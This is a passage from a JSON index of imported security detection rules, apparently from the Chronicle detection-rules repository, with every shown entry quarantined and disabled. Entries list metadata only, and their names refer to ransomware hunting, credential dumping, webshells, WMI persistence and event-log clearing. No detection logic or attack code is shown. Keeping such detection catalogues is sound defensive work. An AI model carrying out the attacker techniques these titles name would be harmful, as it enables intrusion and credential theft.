"detections/chronicle-imports/_quarantine/vt-relationships-file-downloaded-from-url.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "vt_relationships_file_downloaded_from_url", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/vt_relationships_file_downloaded_from_url.yaral" } }, { "id": "chronicle-detection-rules-vt-relationships-file-executes-file", "type": "detection", "name": "vt_relationships_file_executes_file", "description": "vt_relationships_file_executes_file", "version": "1.0.0", 
"author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/vt-relationships-file-executes-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "vt_relationships_file_executes_file", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/vt_relationships_file_executes_file.yaral" } }, { "id": "chronicle-detection-rules-vulnerable-netlogon-secure-channel-connection-allowed", "type": "detection", "name": "vulnerable_netlogon_secure_channel_connection_allowed", "description": "vulnerable_netlogon_secure_channel_connection_allowed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/vulnerable-netlogon-secure-channel-connection-allowed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "vulnerable_netlogon_secure_channel_connection_allowed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/_deprecated/soc_prime_rules/proactive_exploit_detection/system/vulnerable_netlogon_secure_channel_connection_allowed.yaral" } }, { "id": "chronicle-detection-rules-wannacry-ransomware", "type": "detection", "name": "wannacry_ransomware", "description": "wannacry_ransomware", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/wannacry-ransomware.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "wannacry_ransomware", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/wannacry_ransomware.yaral" } }, { "id": "chronicle-detection-rules-wannacry-ransomware-via-sysmon", "type": "detection", "name": "wannacry_ransomware_via_sysmon", "description": "wannacry_ransomware_via_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/wannacry-ransomware-via-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "wannacry_ransomware_via_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": 
"https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/wannacry_ransomware_via_sysmon.yaral" } }, { "id": "chronicle-detection-rules-wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group", "type": "detection", "name": "wastedlocker_a_new_ransomware_variant_developed_by_the_evil_corp_group", "description": "wastedlocker_a_new_ransomware_variant_developed_by_the_evil_corp_group", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "wastedlocker_a_new_ransomware_variant_developed_by_the_evil_corp_group", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/wastedlocker_a_new_ransomware_variant_developed_by_the_evil_corp_group.yaral" } }, { "id": "chronicle-detection-rules-wastedlocker-ransomware-hunting-credential-dumping", "type": "detection", "name": "wastedlocker_ransomware_hunting_credential_dumping", "description": "wastedlocker_ransomware_hunting_credential_dumping", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": 
"imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/wastedlocker-ransomware-hunting-credential-dumping.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "wastedlocker_ransomware_hunting_credential_dumping", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/process_creation/wastedlocker_ransomware_hunting__credential_dumping.yaral" } }, { "id": "chronicle-detection-rules-wastedlocker-ransomware-hunting-defense-evasion", "type": "detection", "name": "wastedlocker_ransomware_hunting_defense_evasion", "description": "wastedlocker_ransomware_hunting_defense_evasion", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/wastedlocker-ransomware-hunting-defense-evasion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "wastedlocker_ransomware_hunting_defense_evasion", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/process_creation/wastedlocker_ransomware_hunting__defense_evasion.yaral" } }, { "id": "chronicle-detection-rules-wastedlocker-ransomware-hunting-initial-access-and-compromise", "type": "detection", "name": 
"wastedlocker_ransomware_hunting_initial_access_and_compromise", "description": "wastedlocker_ransomware_hunting_initial_access_and_compromise", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/wastedlocker-ransomware-hunting-initial-access-and-compromise.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "wastedlocker_ransomware_hunting_initial_access_and_compromise", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/process_creation/wastedlocker_ransomware_hunting__initial_access_and_compromise.yaral" } }, { "id": "chronicle-detection-rules-wdigest-enable-uselogoncredential", "type": "detection", "name": "wdigest_enable_uselogoncredential", "description": "wdigest_enable_uselogoncredential", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/wdigest-enable-uselogoncredential.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "wdigest_enable_uselogoncredential", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": 
"https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/wdigest_enable_uselogoncredential.yaral" } }, { "id": "chronicle-detection-rules-webshell-detection-with-command-line-keywords", "type": "detection", "name": "webshell_detection_with_command_line_keywords", "description": "webshell_detection_with_command_line_keywords", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/webshell-detection-with-command-line-keywords.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "webshell_detection_with_command_line_keywords", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/webshell_detection_with_command_line_keywords.yaral" } }, { "id": "chronicle-detection-rules-webshell-detection-with-sysmon-logs", "type": "detection", "name": "webshell_detection_with_sysmon_logs", "description": "webshell_detection_with_sysmon_logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/webshell-detection-with-sysmon-logs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the 
AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "webshell_detection_with_sysmon_logs", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/webshell_detection_with_sysmon_logs.yaral" } }, { "id": "chronicle-detection-rules-whoami-execution", "type": "detection", "name": "whoami_execution", "description": "whoami_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/whoami-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "whoami_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/whoami_execution_part_1.yaral" } }, { "id": "chronicle-detection-rules-whoami-execution-part-1", "type": "detection", "name": "whoami_execution_part_1", "description": "whoami_execution_part_1", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/whoami-execution-part-1.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC 
engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "whoami_execution_part_1", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/whoami_execution_part_2.yaral" } }, { "id": "chronicle-detection-rules-whois-dns-query-to-typosquatting-domain", "type": "detection", "name": "whois_dns_query_to_typosquatting_domain", "description": "whois_dns_query_to_typosquatting_domain", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/whois-dns-query-to-typosquatting-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "whois_dns_query_to_typosquatting_domain", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/whois_dns_query_to_typosquatting_domain.yaral" } }, { "id": "chronicle-detection-rules-whois-expired-domain-accessed", "type": "detection", "name": "whois_expired_domain_accessed", "description": "whois_expired_domain_accessed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/whois-expired-domain-accessed.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "whois_expired_domain_accessed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/whois_expired_domain_accessed.yaral" } }, { "id": "chronicle-detection-rules-whois-expired-domain-executable-downloaded", "type": "detection", "name": "whois_expired_domain_executable_downloaded", "description": "whois_expired_domain_executable_downloaded", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/whois-expired-domain-executable-downloaded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "whois_expired_domain_executable_downloaded", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/whois_expired_domain_executable_downloaded.yaral" } }, { "id": "chronicle-detection-rules-whois-recently-created-domain-access", "type": "detection", "name": "whois_recently_created_domain_access", "description": "whois_recently_created_domain_access", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": 
"imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/whois-recently-created-domain-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "whois_recently_created_domain_access", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/whois_recently_created_domain_access.yaral" } }, { "id": "chronicle-detection-rules-win-pua-detection-of-uncommon-rmm", "type": "detection", "name": "win_pua_detection_of_uncommon_rmm", "description": "win_pua_detection_of_uncommon_rmm", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/win-pua-detection-of-uncommon-rmm.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "win_pua_detection_of_uncommon_rmm", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/win_pua_detection_of_uncommon_rmm.yaral" } }, { "id": "chronicle-detection-rules-win-repeatedauthfailure-thensuccess-t1110-001", "type": "detection", "name": "win_repeatedAuthFailure_thenSuccess_T1110_001", "description": "win_repeatedAuthFailure_thenSuccess_T1110_001", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", 
"mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/win-repeatedauthfailure-thensuccess-t1110-001.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "win_repeatedAuthFailure_thenSuccess_T1110_001", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/win_repeatedAuthFailure_thenSuccess_T1110_001.yaral" } }, { "id": "chronicle-detection-rules-win-repeatedauthfailure-thensuccess-t1110-001-user-asset-entity", "type": "detection", "name": "win_repeatedAuthFailure_thenSuccess_T1110_001_user_asset_entity", "description": "win_repeatedAuthFailure_thenSuccess_T1110_001_user_asset_entity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/win-repeatedauthfailure-thensuccess-t1110-001-user-asset-entity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "win_repeatedAuthFailure_thenSuccess_T1110_001_user_asset_entity", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/win_repeatedAuthFailure_thenSuccess_T1110_001_user_asset_entity.yaral" } }, { "id": 
"chronicle-detection-rules-win-short-term-account-use", "type": "detection", "name": "win_short_term_account_use", "description": "win_short_term_account_use", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/win-short-term-account-use.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "win_short_term_account_use", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/win_short_term_account_use.yaral" } }, { "id": "chronicle-detection-rules-win-susp-or-malicious-service-created", "type": "detection", "name": "win_susp_or_malicious_service_created", "description": "win_susp_or_malicious_service_created", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/win-susp-or-malicious-service-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "win_susp_or_malicious_service_created", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/community/microsoft/windows/win_susp_or_malicious_service_created.yaral" } }, { "id": "chronicle-detection-rules-windows-10-scheduled-task-sandboxescaper-0day", "type": "detection", "name": "windows_10_scheduled_task_sandboxescaper_0day", "description": "windows_10_scheduled_task_sandboxescaper_0day", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/windows-10-scheduled-task-sandboxescaper-0day.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "windows_10_scheduled_task_sandboxescaper_0day", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/windows_10_scheduled_task_sandboxescaper_0_day.yaral" } }, { "id": "chronicle-detection-rules-windows-event-log-cleared", "type": "detection", "name": "windows_event_log_cleared", "description": "windows_event_log_cleared", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/windows-event-log-cleared.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "windows_event_log_cleared", "source_commit": "74dd490", 
"license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/windows_event_log_cleared.yaral" } }, { "id": "chronicle-detection-rules-windows-powershell-user-agent", "type": "detection", "name": "windows_powershell_user_agent", "description": "windows_powershell_user_agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/windows-powershell-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "windows_powershell_user_agent", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/windows_powershell_user_agent.yaral" } }, { "id": "chronicle-detection-rules-windows-powershell-webdav-user-agent", "type": "detection", "name": "windows_powershell_webdav_user_agent", "description": "windows_powershell_webdav_user_agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/windows-powershell-webdav-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", 
"source_id": "windows_powershell_webdav_user_agent", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/windows_powershell_webdav_user_agent.yaral" } }, { "id": "chronicle-detection-rules-windows-shell-spawning-suspicious-program", "type": "detection", "name": "windows_shell_spawning_suspicious_program", "description": "windows_shell_spawning_suspicious_program", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/windows-shell-spawning-suspicious-program.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "windows_shell_spawning_suspicious_program", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/windows_shell_spawning_suspicious_program.yaral" } }, { "id": "chronicle-detection-rules-winrm-configuration-detector", "type": "detection", "name": "winrm_configuration_detector", "description": "winrm_configuration_detector", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/winrm-configuration-detector.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "winrm_configuration_detector", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/winrm_configuration_detector.yaral" } }, { "id": "chronicle-detection-rules-winrm-session-created-sysmon-behavior", "type": "detection", "name": "winrm_session_created_sysmon_behavior", "description": "winrm_session_created_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/winrm-session-created-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "winrm_session_created_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/winrm_session_created__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-wmi-event-subscription", "type": "detection", "name": "wmi_event_subscription", "description": "wmi_event_subscription", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", 
"enabled": false, "path": "detections/chronicle-imports/_quarantine/wmi-event-subscription.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "wmi_event_subscription", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/wmi_event_subscription.yaral" } }, { "id": "chronicle-detection-rules-wmi-persistence-command-line-event-consumer", "type": "detection", "name": "wmi_persistence__command_line_event_consumer", "description": "wmi_persistence__command_line_event_consumer", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/wmi-persistence-command-line-event-consumer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "wmi_persistence__command_line_event_consumer", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/wmi_persistence___command_line_event_consumer.yaral" } }, { "id": "chronicle-detection-rules-wmi-persistence-script-event-consumer", "type": "detection", "name": "wmi_persistence__script_event_consumer", "description": "wmi_persistence__script_event_consumer", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", 
"category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/wmi-persistence-script-event-consumer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "wmi_persistence__script_event_consumer", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/wmi_persistence___script_event_consumer.yaral" } }, { "id": "chronicle-detection-rules-wmi-spawning-windows-powershell", "type": "detection", "name": "wmi_spawning_windows_powershell", "description": "wmi_spawning_windows_powershell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/wmi-spawning-windows-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": 